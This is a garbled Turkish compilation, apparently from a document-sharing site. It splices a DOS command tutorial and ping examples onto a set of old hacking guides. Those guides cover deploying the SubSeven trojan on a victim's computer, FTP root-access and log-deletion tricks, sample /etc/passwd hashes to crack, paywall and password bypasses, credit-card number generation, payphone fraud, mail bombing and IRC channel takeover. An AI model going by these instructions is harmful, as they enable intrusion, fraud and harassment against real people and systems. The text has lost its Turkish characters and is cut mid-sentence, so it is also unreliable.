Professional Documents
Culture Documents
Msdos Komutları Hack
Msdos Komutları Hack
Msdos Komutları Hack
rnekler:
(1) canopus bilgisayari ile olan network bagini kontrol etmek ve gonderilecek
echo istegi sayisini belirtmek icin:
ping -c 5 canopus VEYA ping canopus 56 5
Ornek Cikti:
PING canopus.austin.century.com: (128.116.1.5): 56 data bytes
64 bytes from 128.116.1.5: icmp_seq=0 ttl=255 time=2 ms
64 bytes from 128.116.1.5: icmp_seq=1 ttl=255 time=2 ms
64 bytes from 128.116.1.5: icmp_seq=2 ttl=255 time=3 ms
64 bytes from 128.116.1.5: icmp_seq=3 ttl=255 time=2 ms
64 bytes from 128.116.1.5: icmp_seq=4 ttl=255 time=2 ms
----canopus.austin.century.com PING Statistics---round-trip min/avg/max = 2/2/3 ms
Ornek Cikti:
Ping stlopnor.austin.century.com: (129.35.34.234): 56 data bytes
.^C
----stlopnor.austin.century.com PING Statistics ---1098 packets transmitted, 1097 packets received, 0% packet loss
round-trip min/avg/max = 4/4/11
Not: Cikti, Ctrl-Cye basilana kadar tekrar eder.
(4) opus bilgisayarina gonderilen paketler arasinda 5 saniyelik ara birakmak icin:
ping -i5 opus
Ornek Cikti:
PING opus.austin.century.com: (129.35.34.234): 56 data bytes
64 bytes from 129.35.34.234: icmp_seq=0 ttl=255 time=5 ms
64 bytes from 129.35.34.234: icmp_seq=1 ttl=255 time=5 ms
64 bytes from 129.35.34.234: icmp_seq=2 ttl=255 time=6 ms
^C
----opus.austin.century.com PING Statistics---3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 5/5/6 ms
Not: Cikti, Ctrl-Cye basilana kadar tekrar eder.
(5) Preload degiskeniyle belirtilen paket sayisini, normal moda gecmeden once
mumkun oldugu kadar cabuk opus bilgisayarina gondermek icin:
ping -l 10 opus
Ornek Cikti:
PING opus.austin.century.com: (129.35.34.234): 56 data bytes
64 bytes from 129.35.34.234: icmp_seq=0 ttl=255 time=9 ms
64 bytes from 129.35.34.234: icmp_seq=2 ttl=255 time=16 ms
64 bytes from 129.35.34.234: icmp_seq=3 ttl=255 time=22 ms
64 bytes from 129.35.34.234: icmp_seq=4 ttl=255 time=26 ms
64 bytes from 129.35.34.234: icmp_seq=5 ttl=255 time=27 ms
64 bytes from 129.35.34.234: icmp_seq=6 ttl=255 time=30 ms
64 bytes from 129.35.34.234: icmp_seq=7 ttl=255 time=31 ms
64 bytes from 129.35.34.234: icmp_seq=8 ttl=255 time=33 ms
Bir klasrden dierine gemek iin, baka bir deyile klasr deitirmek iin cd
komutu kullanlr. Bir klasre geildiinde komut satrnn solunda o klasrn ad
bulunur. Her klasrde sadece ad verilerek ancak bir altndaki klasre geilebilir.
Bir st klasre klasr ismi olarak '..' girilerek gidilebilir. Bir alt ve bir st dzey
dndakiler gemek ya adm adm klasr deitirerek ya da geilecek klasrn
tam yolu verilerek ulalabilir.
CD Klasr Klasre ge.
CD .. Bir steki klasre ge.
CD Bulunulan klasr gster.
MD : Klasr yarat.
Yeni bir klasr yaratmak iin md komutu kullanlr. Bu komut girildiinde yaratlan
klasr elbette henz bo durumdadr. Kullanclar butun dosyalarn ayn yerde
bulundurmak yerine, onlar belli gruplara ayrp, her bir grubu bu komutla
yaratacaklar ayr bir klasrlerde tutabilirler.
MD Klasr Klasr yarat.
RD : Klasr yok et.
Bo bir klasr silmek iin rd komutu kullanlr. Ancak silinecek klasr bo
olmaldr, yoksa silinemez. Bir klasr yok edilmeden nce ierisinde bulunan
btn dosyalarn silinmesi gerekir.
RD Klasr Klasr yok et.
DEL : Dosya sil.
Bir dosyay silmek iin del komutu kullanlr. Bir dosya silindiine sadece
iindekiler silinmez, dosya tmyle yok olur. Baz koullarda silinen bir dosyann
kurtarlmas zel baz programlar araclyla mmkn olabilmektedir. Ancak bu
programlar her yerde bulunmamakta ve kurtarma ilemlerini her zaman baaryla
gerekletirememektedirler. O yzden bu komut dikkatli kullanlmal ve nemli
dosyalarn her zaman bir yedei bulundurulmaldr.
DEL Dosya Dosyay sil.
DEL Klasr Klasrn iindeki tm dosyalar sil.
TYPE : Dosya ieriini gster
Bir dosyann ierii ( ierisinde bulunanlar yazlar) type komutuyla ekranda
gsterilebilir. Ancak sadece ierisinde standart biimde oluturulmu metinler
bulunan dosyalar bu yolla grntlenebilir. Yazlara biimlendirme gibi bir ok
ilev ve grn deiiklii eklemeleri yapabilen 'Word' gibi kelime ilemci
programlarda oluturulmu dosyalarn ierikleri bu yolla (zel olarak metin
dosyas olarak kaydedilmediyse) grntlenemez. Ayrca yaz dnda resim,
program kullanlr. Bu program DOS ile birlikte gelmekle birlikte aslnda bir komut
deil, eitli menlerle zenginletirilmi metin dzenlemeZ uygulamasdr.
Kullanclar genellikle daha ok ileve sahip dier kelime ilemci programlarla
alrlar. Ancak bu programlarn iletim sisteminden ayr olarak satn alnmas,
yklenmesi ve genellikle karmak olan kullanmlarnn renilmesi gerekir. Oysa
'edit' daima DOS'la birlikte bulunur ve her zaman kullanlabilir.
EDIT Dosya Dosyay dzenlenmesi iin a.
A: Disket srcye ge.
Sabit disk veya baka bir srcdeyken disket srcsne gemek iin a:
girilmelidir. Harfi izleyen ':' iaretini kullanmak zorunludur.
C: Sabit diske ge.
Disket src veya baka bir srcdeyken sabit diske gemek iin c: girilmelidir.
Bylece src deitirip tekrar geri gelindiinde, komut satrnda nceki
durumda bulunulan klasrn ismi bulunur. Bir srcye gemek o srcnn en
tepesine gemek demek deildir. Sabit diskte herhangi bir klasrn altnda
bulunuyorken en tepeye yani kk dizine gemek iin cd komutu klasr ad olarak
'\' girilmelidir.
leri DOS Komutlar
Yukarda saylan komutlar dnda, kullanclarn zaman zaman gereksinim
duyabilecekleri bir ok komut bulunmaktadr. Normal bir kullanc bunlardan
sadece nemli olanlar bilmelidir. Dier komutlarn ou kullancnn normal
artlarda gereksinim duymad, sadece zel bir ilevi yerine getiren komutlardr.
Burada deinilecek komutlar dnda kalan baz komutlar da son derece tehlikeli,
uzman kullanclar dndakileri kesinlikle kullanmamas gereken komutlardr.
Burada deinilenlerse normal kullanclarn da zaman zaman ihtiya duyabilecei
komutlardr.
CLS : Ekran temizle.
DOS ekrannda daha nce girilen komutlar ve bunlarn rettii sonular komut
satrnn ( genellikle sadece son birka komutunkiler grnecek zere)
yukarsnda kalr. Komut satrnn zerindekileri silmek ve komut satrn en st
satra almak iin cls komutu kullanlr.
DATE : Tarihi gster.
DOS iletim sisteminde gn tarihini grmek ve deitirmek iin 'date' komutu
kullanlr. Bu komut girildiinde ekran bugnn tarihi gelir ve yeni tarihin girilmesi
beklenir. Hibir ey girmeden 'Enter' tuuna baslrsa tarih deitirilmeksizin
bugnn tarihi renilmi olur.
FC : Dosyalar karlatr.
ki dosya arasndaki farklarn ve bu farklarn olutuu satrlarn bulunmas iin
kullanlan komut fc'dir . Bu komut iki dosyann ( isim ve konum asndan farkl
olsalar da) ierik asndan ayn olup olmadn kontrol etmek iin kullanlabilir
FC Dosya1 Dosya2 Ad verilen dosyalar karlatr.
LABEL : Diskin etiketini deitir
Her disk ve disketin bir etiket'i yani ad vardr ve bu ad label komutuyla
deitirilebilir. Baz durumlarda iletim sistemleri, disket veya disketleri zerindeki
yaz veya renk gibi fiziksel zelliklerinden tanyamayaca iin, bir diske veya
diskete bu isimle referans verirler.
LABEL Src Srcnn etiketini deitir.
FIND : Belirtilen yazy bul.
Bir dosya ierisinde geen bir szck veya ifadeyi bulmak iin find komutu
kullanlr. Bu komutla ierii hakknda belli bir fikir sahibi olunan ancak ismi
bilinmeyen dosyalar bulmak mmkn olabilmektedir.
FIND "Yaz" Dosya Yazy dosya iinde bul.
CHKDSK : Disk(et)in durumunu gster.
Bir disk veya disket iinde kullanlan ve kullanlmayan alanlarn bykln, ne
kadarlk ksmn bozuk veya kullanlamaz durumda olduunu olmak iin chkdsk
komutu kullanlr. Ancak disk veya disketler zerinde daha geni bir inceleme
yapmak iin daha kapsaml bir program kullanmak gerekir
MEM : Bellein durumunu gster.
Bilgisayarn iindeki bellek biriminin kapasitesini, belli bir anda bu kapasitenin ne
kadarnn kullanldn ve ne kadarnn bo olduunu renmek iin mem komutu
kullanlr.
DELTREE : Klasr altndakilerle birlikte yok et.
Bir klasr 'del' komutuyla silindiinde yok olmaz. Silinen sadece altnda bulunan
dosyalardr. Bununla birlikle, 'rd' komutu da bir klasr bo olmadka
silmemektedir. Bir klasr altndaki dosya ve klasrleriyle birlikte yok etmek iin
deltree komutunu kullanmak gerekir. Bu komutun geri dn olmad iin yok
edilecek klasrn altnda bulunan btn nesnelerin ne ierdii bilinerek
kullanlmaldr.
/server 195.33.226.5:23 ----------->bu komutla sanki bir irc server a baglanir gibi wingate server a
baglaniyoruz.Ayni sekilde isterseniz add server ile listenizede ekleyip sonra bu server lara direkt connect te
edebilirsiniz.
bir suru yazilar gelecektir look up failed falan filan gibi onlari hic takmayin.WinGate> demesini bekleyin......
WinGate> deyince
/quote irc.emu.edu.tr:6667 ---->Bu komutla irc server a o server dan atliyoruz.
Yine bisuru sey sayikliyacaktir onlari da iplemeyin ....
Muhim olan "irc.emu.edu.tr Connected" demesi.Bunu gorunce
/quote user xxxxx xxxxx mail@adresiniz.com xxxxx --> bu xx lerin veya mail in oldu yerde ne yazdy?y muhim
degildir.Bunlar millet size whois cektiginde gorunecek yazilardir.Istediginizi yazabilirsiniz muhim olan kelime
sayisinin ayni olmasi.
/quote nick isminiz
Bundan sonra bekleyin her zaman oldugu gibi irc de olmaniz gerekir.Eger olmassa baska serverlar
deneyin.Girdiginiz zaman kendinize /whois ve /dns cekerek spoof unuzu deneyebilirsiniz.
TELEFONLARI BEDAVA KULLANMAK!Evet sevgili arkadaslar. Sonunda telefon kartim bitti diye
uzulmiyeceksiniz. Elinizde bulunan tek konturluk kartla bile sabaha kadar konusmak mumkun :)
Bunu yapmak icin neler gerekli:
1) Kartli bir telefon (ahize kolu kalkanlardan)
2) Bir bozuk (arkasindaki siyah data seridine oje surunce kart hemen bozuluyor) birde normal bir telefon karti.
Bele$ konusma:
Kart bittikten ve telefon karti yuttuktan sonra telefonu kapatmadan 0800 yazin. Bu numarayi yazinca ekranda
ucretsiz arama yazicak.
Daha sonra muteakip aramaya basip hemen arkasinda 15-20 kez tekrar arama tusuna basin.
15-20 kez tekrar aramaya bastiktan sonra ekran dolana kadar 2 tusuna basin (yine yaklasik 15-20 defa ediyor).
Bu islemden sonra ekranda ucretsiz arama yazip kaybolacak.
Daha sonra aramak istedigniz numarayi cevirin. Numara ekranda gorunmeyecek.
Aradiginiz numara calinca gecersi karti sokun. Karti reddedecek ama konusma saglanacak. :)
Bu bilgi baska bir siteden alinmistir dogrulugu bilinmemektedir.
SubSeven
[t a n m]
SubSeven' uzaktan yonetim icin veya hackng program olarak kullanabilirsiniz. Zip dosyasnn icinde iki tane
program var bi tanesi server.exe bunu kurbann bilgisayarnda calstrmalsnz netbustan filan girip upload
edebilirisiniz. Sebseven.exe ise esas program her seyi bu program sayesinde yapacaksnz...
[naslcalsyor]
Kullanm basit bi trojan. Kurban bilgisayarda server.exeyi calstryorsunuz, gostermelik bi hata mesaj belirecek
[soyle: error loading system resources]. bundan sonra program kendini otomatik hardiske kuracak, ve windows
her acldgnda oda aclacak. SubSeven.exe anaprogram netbus gibi bi sey her seyi bundan yapacaksnz.
[ozellikler]
+ Adama mesaj yollarsnz, ve cevap verebilir
+ Browser acp istediginiz siteye yonlendirirsiniz
+ Start butonunu saklar
+ Kullancnn dektop goruntusunu alabilirsiniz..
+ Keyboard tuslar calsmaz
+ Kurban'la chat yapabilirsiniz. cq chat gibi bir program var her zaman ustte olucak yani hic bi zaman
kucultemez. Chatlesirken bi kac numara yapabilirsiniz. .Kurbann yazdg yer kaybolur sadece sizin yazdklarnz
gorur kendisi yazamaz. Chat'ide kapatamaz ancak bilgisayar kapamak zorunda kalr..
+ Pc Speaker' acp kapar.
+ Windowsu yeniden baslatr.
+ CD-ROM'u acp kapar
+ Mouse trail' ekleyebilirsiniz.[Hani su mouse'un arkasndan gelen bi ok daha varya o iste]
+ Server'a sifre koyabilirsiniz.
+ Ack olan pencerelrin listesini alabilirsiniz:
- stediginiz pencereyi kapayabilirsiniz
- enable/disable yapabilirsiniz.Kurban pencereyi acamaz
- Pencereyi kapama tusunu iptal edebilirsiniz
+ Kurbann bilgisyarndaki butun suruculerin listesini verir.
+ Monitoru acp/kapar.
+ Gorev cubugunu saklar.
+ Kullancnn bilgisayar hakknda daha detayl bilgi alabilirsiniz.Windows version,
1) asdf/asdf
2) 123456/123456
3) fuck/me
4) qwerty
5) q1w2e3
6) zxcvb
7) abc123
Bazen de site ismi kullanc ad ve ifre olarak kullanlabilmekte. rnein:
domain: hotbabes.com, kullanc ad: hot, ifre: babes gibi, ya da kullanc ad: hotbabes, ifre: hotbabes
gibi.
Denemeleri arttrmak olas..
3: <ENTER> FRES: Pek ok ifre oluturma program kullancn ifre girip girmediini kotrol etmez.
(zellikle adult sitelerde). Kullanc adn john, 123456, hotmail vs. vs. girip ifre alann bo brakarak pek
ok adult siteye girebilirsiniz. Adult sitelere giri iin kullanlan en popler yntemlerden biri de budur.
4: FRE DOSYASI: Giri iin en zor yntemlerden biri. Bir nceki sayda anlatlan ifre dosyasn bulup
CrackerJack vs. tr bir programla ifreyi krp kullanmak. Eer bunu yapabiliyorsanz nasl olsa siteye bir arka
kap koyarsnz. Bu yazy okumanza gerek yok :))
5: SSTEM YNETCS BLM: Pek ok web sitesinde bir web sistem yneticisi kullanc ekler/siler. Ayn
zamanda pekok sistem yneticisi blm korunmaz. Pekok web sayfasnda sistem yneticisi girii site
adresi/admin.html'dir:
www.site.com/admin.htm
www.site.com/admin.html
Eer bu tr bir giri yakalayabilirseniz snrsz kullanc aabilirsiniz ya da istediiniz kullancy silebilirsiniz.
(Sistem yneticisi de dahil).
6: YELER DZN: Pekok web sitesinde yeler dizinine ifreyle giri yaplabilirken ayn dizine direk adres
verilerek de giri yaplabilmektedir. rnein /members dizinine
www.site.com (direkt)
www.site.com/members
www.site.com/members/home
www.site.com/members/pictures
www.site.com/archive
www.site.com/secure
www.site.com/images/index.html (htm)
www.site.com/Restricted/Index.html
http://members.site.com (ok kullanlan bir yntem)
Dier bir yntemde; domain adna gre yeler girii bulunabilir. rnein www.webyoung.com iin arka kap
girii www.webyoung.com/young.htm (html) olabilir.
7: FRE EKLEYC PROGRAMI: Bir adult siteye para verip ye olmak istediinizde nce sizin kullanmak
istediiniz kullanc adnn olup olmad kontrol edilir. Eer yoksa kullanc ad sisteme eklenir. Baaryla
kullanc eklendi gibi bir mesaj aldktan sonra bu sayfay kaydedin. Aradan biraz zaman getikten sonra
(ifreniz artk almyorsa) tekrar ayn sayfaya girip yeniden kullanc aabilirsiniz!. (Tabii para demeden)
Gvenlii ok iyi olan pek ok sitede bile bu yntem ou zaman geerlidir. Kaydettiiniz sayfanz kodlarna
baktnzda bir PIN numaras ya da gvenlik numaras greceksiniz. (<input type="hidden" name="PIN"
value="4788236">) gibi. Value alann deitirerek sisteme yeniden farkl bir kullanc amanz da olas.
BIR SITENIN PASSWORDUNU ELE GECIRDIKTEN SONRA SITEDE ARKA KAPI (YANI SIFRESIZ BIR YER) VAR MI
DIYE KONTROL ETMEK YERINE BU ISI TELEPORT PRO ILE YAPIN TABI SITEDEKI RESIMLERI BULMAYA
AYAPLAMAYIN TELEPORT PRO YU YOKSA ISINIZ UZUN SURER BUNLARI TELEPORT PRO VASITASIYLA CEKTIKTEN
SONRA ELINIZLE KONTROL EDIN OZELLIKLE MEMBERS DIYE BASLIYAN YERLER VAR ISE BU TIP YERLERI
GENELDE SIFRELIDIR FIFRELI OLMAYABILIR AMA SANSINIZ VAR ISE SITEDE BASKA BIR YERE LINK VERILMISSE
MESELA SIZ WWW.XXX.COM/MEMBERS TASINIZ ONLAR WWW.YYY.COM GIBI BIR YERE LINK VERMISLER ISE
ORANIN BEDAVA OLMASI IHTIMALI VAR. EGER GIRILMIYORSA BOS BIR SAYFA CIKIYORSA BUNLAR REFERER
KULLANIYORLAR DEMEKTIR ONLARI KIRMAYI DA ANLATACAGIM
ASLINDA ASIL AMACINIZ SITEDE CGI-BIN YADA CGI-WIN DIYE OLAN DOSYALARI BULMAKTIR BUNLAR COK
BUYUK IHTIMALLE BASKA YERLERE VERDIKLERI REFERRER LINKLERINI YADAKENDI SITELERINDEKI BEDAVA
GIRISLERI GOSTERIR MESELA SU ORNEKTEKI GIBI
http://www.clubwicked.com/cgi-bin/stryseek.cgi?head=index.html
bu mesela sitenin ana sayfasini acar eger
http://www.clubwicked.com/cgi-bin/stryseek.cgi?head=cinemax.html
derdeniz sitenin sinema sayfasina gidersiniz vb bunun gibi
BAZEN DE REFERER KULLANMAK GEREKIR YANI SIZ ADRESI DIREKT YAZSANIZ GIREMEZSINIZ AMA O
ADRESTEN TIKLARSANIZ GIRERSINIZ BEN YENI BIR YOL BULDUM BU COK KOLAY BIR YOL BOYLECE BUTUN
DUNYANIN SEX SITELERI AYAGINIZIN DIBINDE BAKIN MESELA SU ADRES BIR ORNEK OLSUN
http://www.adultmagazine.com/cgi-bin/tv?page=1998/08/cover.html&ID=00409666
BAKIN AACIP GARIP BIR SURU SALAK ISARETLE DOLU BIR ADRES ONCE BU ADRESE GIDIN SIZE MUTLAKA
INTERNAL SERVER ERROR HATASI VERECEK HEHE ASLINDA SIZ ICERDESINIZ SIZI KANDIRIYO ADAM GITMENIZ
GEREKEN ADRES ASLINDA SU ISE TUM FAZLALIKLARI ATALIM BU ADRESE GIREMEDINIZ SIMDI AYNI SAYFADA
FAZLALILLARI ATALIM VE SOYLE YAZALIM
http://www.adultmagazine.com/1998/08/cover.html
cgi-bin i attym; /tv?page= i attym &ID=00409666 i attym boylece sayfadayym
BAZI ADRESLER DE SIZIN NEREDEN GELDIGIZE BAKARAK SIZI HEMEN BASKA BIR SAYFAYA GONDERMEYE
KALKARLAR NE YAPMANIZ GEREK O SIZI ISTEDIGI SAYFAYA GONDERMEDEN ONCE HEMEN STOP A BASIN KI O
SAYFAYA GITMESIN O SAYFADA KALIN BU SAYFA SIZIN NEREDEN GELDIGINIZE BAKARAK SIZI YA PARA
ISTEDIGI SAYFAYA YA DA GERCEK VIDEO YADA RESIM SAYFASINA GONDERIR OYLEYSE BIZ STOP A BASIP BIZI
GONDERECEGI GERCEK RESIM VEYA VIDEO SAYFASNA GIDERIZ O KADAR MESELA
http://www.missx.com/live/liv.cgi?type=html&name=pics2.html
BU SAYFA SIZI HEMEN MEMBERS KLASORUNE ATMAYA CALISACAKTIR
HEMEN STOP A BASIN INTERNAL SERVER ERROR DIYINCE TABI IKI UC KERE O SAYFADA KALIN EEE SIMDI
NEREYE GIDECEZ TABI KI ANA KLASORLERINE GIDELIM
http://www.missx.com/live/
YAZDIGIMIZ ZAMAN 100BINLERCE RESIM KARSIMIZDA
Bu yaz kurtadam tarafndan hazrlanmtr.
Anladiginiz gibi bu tur hizlica yazilabilecek kelime ve sayilar.Bu arada bir tiyo.En saglam sifreler kelimelerle
sayilarin birlesiminden olusur.
Arka kapilar :
Sitelerin arka kapilari genelde korumasi olmayan dizinlerdir(folder).Bir ornek:
Hard Disk----->Web Server Dizini----->ResimlerDizini----->Korumali Dizin(.ht dosyalarinin oldugu dizin !)-->Members Bolumu.
Sizce buradaki arkakapi hangisi ? Resimler dizini.Resimler dizini sifre korumali degil cunku korumali dizinin icinde
degil.Bu bosluktan yararlanarak resimler dizini arkakapi olarak kullanilir ve iceri dalinilir....:)
Kredi Karti :
Bu oldukca basit bir yontem olmakla beraber bezdiriciligi de hat safhada olabilir.Bunun icin bir kredikart numarasi
yreten program bir de fake ip lazim.Kr.kart numarasi uretmek kolay tutturmak zordur.Bulursanizda yasal olarak
ancak harddiskinizde borsacilik oynamaniz lazim.
hehe...Fake ip almaninsa bikac yolu var.Ya www.anonymizer.com veya iproxy.com sitelerinden ve ya proxy server
uzerinden login olarak.Ve ya "fake ip now" adindaki programi kullanabilirsiniz.
Sonra istediginiz siteye uye olabilirsin parasini sayarak.
.htaccess & .htpasswd Dosyalari:
Bu dosyalar korumali dizin icerisindedir.Ve ya /members , /admin ve /secure dizinleri altinda bulunabilir. .htaccess
dosyasi uyeler hakkinda yararli bilgiler icerir ve de daha fazla bilgiyi nerede bulacaginizi belirtir.rnek : /etc
dizini .Ayrica .htaccess dosyasinda .htpasswd dosyasinin nerde oldugu da belirtilir.Baska bir dizinde hatta
serverda olabilir. .htpasswd dosyasi sifre bilgilerini icerir , jack ve john adindaki kardeslerle daha yakin bir dostluk
kurdurulailir. ;)
AIDATA DA IP BULMAK
Aidata'da IP lerinin gzkmemesini gvence alarak kfr eden insanlar var. Bu tip insanlarn IP sini bulmanz iin
yapmanz gereken eyler;
ncelikle sizin nick 'iniz Register edilmi olacak. ( kendiniz register edebilirsiniz )
Ardndan rastgele bir kanala girin ( register edilmemi olacak! rnek; #jdfshgb ). Ve oday register edin ( /msg
chanserv register #kanal_adi sifre aciklama ). Sonra register'dan sonra identify edin kendinizi ( /msg chanserv
identify #kanal_adi sifre ). Sonra Ip sini almak istediiniz kiinin nick 'ini yle yazyorsun; ( IP sini bilmek
istediiniz nick registerl olacak ) "/msg chanserv set #odaad founder nick" .
Daha sonra Founder Changed gibi yazilar gelecek. O zaman iimiz halloldu demektir. Ve son bir komutla Ip
karmza geliyor!
"/msg chanserv info #odaad"
Yardmlarndan dolay C3 (centris)'e teekkrler!
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
asprilla:3A62i9qr.YmO.:1012:10:kafka
CAFER:/home/user/asprilla:/usr/local/bin/tcsh
hasan:dvUMqNmeeENFs:1016:10:lois figo:/home/user/hasan:/bin/csh
necmettin:ewF90K0gwXVD6:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh
gloglu:kFph8HEM/aaAA:1007:10:Kemal GULOGLU:/home/user/gloglu:/bin/csh
PHF teknigini arkadaslarinizin web page larini hack etmek icin deniye bilirsiniz:))) tabi yukardaki satirlari en iyi
ihtimali goz onune alinarak yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yani asagidaki gibi:
root:*:0:1:Operator:/:/bin/csh
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
asprilla:*:1012:10:CAFER:/home/user/asprilla:/usr/local/bin/tcsh
hasan:*:1016:10:lois figo:/home/user/hasan:/bin/csh
necmettin:*:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh
gloglu:*:1007:10:kemal GULOGLU:/home/user/gloglu:/bin/csh
Bu tek * sifreleri kirdigini iddia eden bazi programlar var ama ben sadece guluyorum shadowed kirmak bence
imkansiz ama yinede john the ripper i cekip deneyebilirsiniz.Hic bir teknik % 100 netice vermez bunu
unutmayin.olaki bir shell aldiniz veya kirdiniz diyelim en az kullanilanini kullanin en son ne zaman kullanildigini
anlamak icin shell in ait oldugu servere port 79 dan baglanin username ve pw i yazin en son baglanilan tarihi size
verir az kullanilan accountlari kullanin.
ANLATIM
1-"Computer name or IP:" sitenin bulunduu ftp adres yazlr (ex:ftp.xoom.com)
2-"username:" bolumune username'i (members.xoom.com/"username") eklinde!
3-"Dictionary file:" bolumunu wordlistin ad yazlr(unsecure'la ayn dizinde olmal!)
4-2. bolumdeki yazlarn anlamlar unlardr;
Dictionary attack: wordlist kullanlarak yaplan saldr!
Brute for attack: 3. bolumden setiinize gore butun harfleri, rakamlar, iaretleri vs. vs.. deniyerek yaplan
saldr! (Bunu semenizi tavsiye atmem iiniz acaip uzar!)
Reconnect on Disconnect: Koptuunda tekrar balanma (kesin iaretleyin)
AutoSave every 100 Attempts: her yuz kelime deneyiinde save etme (size kalmsh eer wordlistiniz buyukse
iaretleyin, kkse demez!)
Shopar Online'den alinmistir.
Server Hack..
Internete baglandktan sonra hemen dos komut istemine'e ckn...
Kurban yerine hackliyceginiz server' yazn adamn servern filan bulmak icin internic.com a gidin search yapn
sayfann en altnda
yazar..
ftp kurban.com
server username sorcak entera basp gecin
server password sorcak entera basp bunuda gecin
ve sunu yazn
quote user ftp
sonra bunu
quote cwd ~root
son olarakta bunu
quote pass ftp
Sonra mutlaka log file n silin cunku sizin girdiginizi anlayabilirler..
Password dosyasi su dizinin icinde " /etc/passwd "
Eger yukardakileri yaptysanz ve server biraz eskiyse root passwordunu alabilirsiniz, bilmeyenler icin soleyelim
root password en
yuksek seviyedeki passdir onunla herseyi yapabilirsiniz..
Not: Bu yontem yeni serverlarda calsmyor. Universitelerde filan calsyor..
Mail Bomb
Mail bomb bildiginiz gibi bir email adresine 100 lerce hatta binlerce mail atilmasiyla atilan kisinin delirmesine
neden oluo :o) ehehe genelde mail bomb yapmak icin kullandiginiz programlar ya bilmem ne dll sini sorar yada
tikladinmi error verir dogru duzgun calisan program bulmak biraz zor size burda mail bomb icin en guzel
programlardan birinin acikliycam bu program sayesinde hem mail bomb yapabilir hemde bir arkadasiniza isimsiz
bir mail de atabilirsiniz ehieh ama diyorsunuzz ki bunu simdi bu sayfayi ogrenen herkez ogrendi ehe ben sizi hiccc
boyle kotu bi durumda birakirmiyim :) nuke ve trojanda da oldugu gibi bundanda kurtulmanin bir yolu var mail
adresinizi unutmak :)))) saka diom tabi ole ters ters bakma :P~ ufak bi program sayesinde mail adresinize gelen
fazlalik maillerde kurtulabilirsiniz.. Simdi sira geldi bu 2 programin aciklamasina...
1- Mail Bomb 2- Delete Mail Bomb
1- Bu mail bomb programi hem oldukca basit hemde isinizi gorebilicek kadar iyi bir program target kismina mail
bomb yapacaginiz kisinin email adresini yaziorsunuz sender e mail bomb yaptigininiz kisinin gormesini istediginiz
adresi yaziorsunuz subject e aciklama yaziyorsunuz server a mail server adresini yaziyorsunuz copies e de kac
tane mail atmak istediginizi yaziyorsunuz asagidaki bolume herhangi bir konu yazabilirsiniz ama bu sadece mail
in daha uzun zamanda gitmesini sagliycakdir tavsiye etmem ve mail e tikladiginizda bomb a basliycakdir :)))
2- Uf diyorsunuzz be kardesim ne halt yemeye ogretiyon bunlari al iste 3000 tane mail geldi ne yapcaz gelde
ogrettigin gibi sil.. ehehe ogretiyoruz ama silmesinide ogretiyoruz :P~ efet bu program pek etrafda aramak
bulabiliceginiz bir program degil benden size bi kiyak olsun bakalim :) retrieve ye kac tane mail i silmek
istediginizi yaziyorsunuz server a mail server adresini yaziyorsunuz user name ye mail adresinizin kullanici ismini
yaziyorsunuz password a da sifrenizi yaziyorsunuz ve connect dedinizmi silmeye basliyor mail bomb la attiginiz
maillerden cok daha hizli gelen mailleri bi programla silebilirsiniz hadi gecmis olsun.. :o)
IRC HACK
Size biraz serverlarla nasi dalga gecilir onu annatcam valla eger cildirtmak istediiniz bi systemadministor veya
operator varsa hemen asagida yazan seyleri uygulayin....
Olaya gavurlar PORT SURF diyolar...nedir yaw bu port surf?? Annatiim:simdi internete bagli her tip makinanin
iletisim (data transferi) yapabilmesi icin cesitli portlar kullandigini biliyorsunuz(en azindan ogrendiniz)bu portlar
internete acilan gediklerdir aslinda.
Bazi portlar ve islevleri:
PORT23 log icin kullanilir
PORT25 e-mail yollamak icin
PORT80 web sayfalari icin
Tamam bu kadar bilgi yeter sanirim cunku saymakla bitmez neyse ne diyoduk hah port surf iste size nasil yapilir
onu anlatacam.
BOLUM 1 FIREWALL tespiti
DOS u acin ve
C:\WINDOWS>tracert 152.163.199.42 (bu ip serverin ip si olmali ben salladim)
Tracing route to dns-01.aol.com [152.163.199.42]over a maximum of 30 hops:
1 * * * Request timed out.
2 150 ms 144 ms 138 ms 204.134.78.201
3 375 ms 299 ms 196 ms essek-cyberport.nm.westnet.net [204.134.78.33]
4 271 ms * 201 ms raks365.nm.org [129.121.1.3]
5 229 ms 216 ms 213 ms h4-0.cnss116.Turknet.t3.ans.net[192.103.74.45]
6 223 ms 236 ms 229 ms f2.t112-0.Gediz.t3.ans.net[140.222.112.221]
7 248 ms 269 ms 257 ms h14.t64-0.Izmir.t3.ans.net [140.223.65.9]
8 178 ms 212 ms 196 ms h14.t80-1.raks.net [140.223.65.14]
9 316 ms * 298 ms h12.t60-0.raks.net [140.223.61.9]
10 315 ms 333 ms 331 ms 207.25.134.18
11 * * * Request timed out.
12 * * * Request timed out.
13 207.25.134.189 reports: Destination net unreachable.
Gibi bi tablo karsimza cikicak. Tablo serverlar zincirini bize gosteriyo bakin 13.Server varya iste o serveri
tanimlayamadi nedeni muhtemelen firewall
Bu demektirki ayni firmanin(ornegin superonline)bir baska serverini deniicez.Yalniz dikkat edilmesi gereken
husus sinyal yolculugumuzun hangi serverda bittigi hep ayni server da bitiyosa bu demektirki bu server ana
serverdir
Ikinci servere da tracert alalim
C:\WINDOWS>tracert 198.83.210.28
server split oldugun da size haber veriyor sizde servere dalip hack etmek istediginiz kanala ilk girip op u
kapiyorsunuz.Tabiki bu yontem cok buyuk kanallar icin imkansiz gibi bisey..(ornegin:undernet-istanbul)
BOT nedir onlardan kurtulmak mumkun mu?
BOT denen sey aslinda ROBOT tan baska bisi degildir.Buyuk firmalar kanallarinda mutlaka BOT
bulundururlar(ornegin:Undernet @X vaya @Y) BOT lar kanallarda otomatik olarak uygulanmasi gereken
prosedurleri uygular(ban-kick-auto op gibi...)Yani guvenlikli ve BOT kullanan bi sistemde kanal split olduktan
sonra siz kanala girip op olsaniz bile BOT sizi deop yapacaktir(BOT olmasa bile LICE yazilimina sahip bir insan op
ta sizi deop yapabilir).
Iste MCB diye bahsettigim program(multi-Collide-Bot) sizin kill edeceginiz nick lerin (bunlar tabiiki op olmali)bir
klonlarini yaratarak BOT un syncronisationunu bozar MCB ye nickleri ve kanal ismini vermeniz yeterli(tabiki bu
